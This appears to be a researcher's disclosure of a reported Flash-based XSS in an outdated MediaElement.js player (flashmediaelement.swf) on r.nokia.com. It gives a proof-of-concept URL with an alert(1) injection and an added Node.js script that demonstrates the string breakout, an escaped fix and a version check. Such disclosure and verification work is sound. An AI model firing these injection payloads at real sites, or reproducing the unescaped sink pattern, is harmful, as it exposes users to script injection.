Here I present a (reported) Flash-based XSS vulnerability I discovered in r.nokia.com, requiring no user interaction.
PoC URL:
http://r.nokia.com/s/6.0/assets/js/flashmediaelement.swf?debug=true&file=x%22});alert(1);//&autoplay=true
This is a well-known vulnerability in the flashmediaelement.swf shipped with MediaElement.js, fixed last year in version 2.11.2 and later (see CVE-2013-1967 and the GitHub patch commit).
The version running on r.nokia.com used to be 2.9.1, as could be seen in:
http://r.nokia.com/s/6.0/assets/js/mediaelement-and-player.js
(mejs.version="2.9.1";)
Screenshot using the Chrome debugger:
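Below, as an added example that is not part of the original post and not code from MediaElement.js, is a small Node.js script covering the two things a practitioner would want to verify here: it decodes the PoC flashvars and shows why the `file` value breaks out of a JavaScript string when a SWF builds its ExternalInterface call by concatenation (mejsBridge and the call shape are a hypothetical, simplified model of that sink, not the real flashmediaelement.swf code), next to a properly escaped variant, and it reads mejs.version out of the player bundle and compares it with the 2.11.2 fix version named above. The player JS text is a constructed sample standing in for the real mediaelement-and-player.js.

```javascript
// Added example for this post; not code from the original page or from
// MediaElement.js. Two practitioner checks around the reported finding:
//  1. decode the PoC flashvars and show how the `file` value escapes a
//     JavaScript string when a SWF builds its ExternalInterface call by
//     concatenation (mejsBridge and the call shape are a hypothetical,
//     simplified sink, not the real flashmediaelement.swf code), next to an
//     escaped variant;
//  2. read mejs.version out of mediaelement-and-player.js and compare it
//     with the first fixed release the post names (2.11.2).

const POC_URL =
  "http://r.nokia.com/s/6.0/assets/js/flashmediaelement.swf" +
  "?debug=true&file=x%22});alert(1);//&autoplay=true";

// Flashvars arrive in the SWF's query string; decode them the way a player would.
function parseFlashvars(url) {
  return Object.fromEntries(new URL(url).searchParams.entries());
}

// Hypothetical vulnerable sink: the raw `file` flashvar is pasted between
// quotes in a JavaScript snippet handed to the browser.
function buildBridgeCallUnsafe(file) {
  return 'mejsBridge({file:"' + file + '"});';
}

// Hardened variant: JSON.stringify emits an escaped JS string literal, so a
// quote or brace inside `file` cannot terminate it. U+2028/U+2029 are escaped
// too because pre-ES2019 engines treat them as line terminators.
function buildBridgeCallSafe(file) {
  const literal = JSON.stringify(file)
    .replace(/\u2028/g, "\\u2028")
    .replace(/\u2029/g, "\\u2029");
  return "mejsBridge({file:" + literal + "});";
}

// Run a generated snippet with alert() and mejsBridge() replaced by stubs and
// report whether alert() was reached, i.e. whether the payload broke out.
function runSnippet(snippet) {
  const result = { alerted: false, received: null };
  const alert = () => { result.alerted = true; };
  const mejsBridge = (o) => { result.received = o.file; };
  new Function("alert", "mejsBridge", snippet)(alert, mejsBridge);
  return result;
}

// Pull the version string out of the player bundle (mejs.version="x.y.z";).
function extractMejsVersion(jsText) {
  const m = /mejs\.version\s*=\s*["']([\d.]+)["']/.exec(jsText);
  return m ? m[1] : null;
}

// Numeric per-component comparison; a plain string compare would rank
// "2.9.1" above "2.11.2" and miss the outdated player.
function compareVersions(a, b) {
  const pa = a.split(".").map(Number);
  const pb = b.split(".").map(Number);
  for (let i = 0; i < Math.max(pa.length, pb.length); i++) {
    const d = (pa[i] || 0) - (pb[i] || 0);
    if (d !== 0) return Math.sign(d);
  }
  return 0;
}

function isVulnerableVersion(jsText, fixedIn = "2.11.2") {
  const v = extractMejsVersion(jsText);
  return v !== null && compareVersions(v, fixedIn) < 0;
}

// Constructed stand-in for the head of mediaelement-and-player.js as seen on
// r.nokia.com; in practice fetch the real file and pass its text instead.
const SAMPLE_PLAYER_JS = 'var mejs=mejs||{};mejs.version="2.9.1";mejs.meIndex=0;';

const flashvars = parseFlashvars(POC_URL);
console.log("decoded file flashvar:", flashvars.file);
console.log("unsafe sink:", buildBridgeCallUnsafe(flashvars.file),
  runSnippet(buildBridgeCallUnsafe(flashvars.file)));
console.log("safe sink:  ", buildBridgeCallSafe(flashvars.file),
  runSnippet(buildBridgeCallSafe(flashvars.file)));
console.log("mejs.version:", extractMejsVersion(SAMPLE_PLAYER_JS),
  "below 2.11.2:", isVulnerableVersion(SAMPLE_PLAYER_JS));
```

Running it prints the decoded flashvar, both generated snippets with whether the stubbed alert() fired, and the version verdict; for a live check, fetch mediaelement-and-player.js and pass its text to isVulnerableVersion. A bundle version below 2.11.2 is a strong indicator but not proof on its own: the SWF can be replaced independently of the JS bundle, so confirm the finding against flashmediaelement.swf itself, as the PoC URL above does.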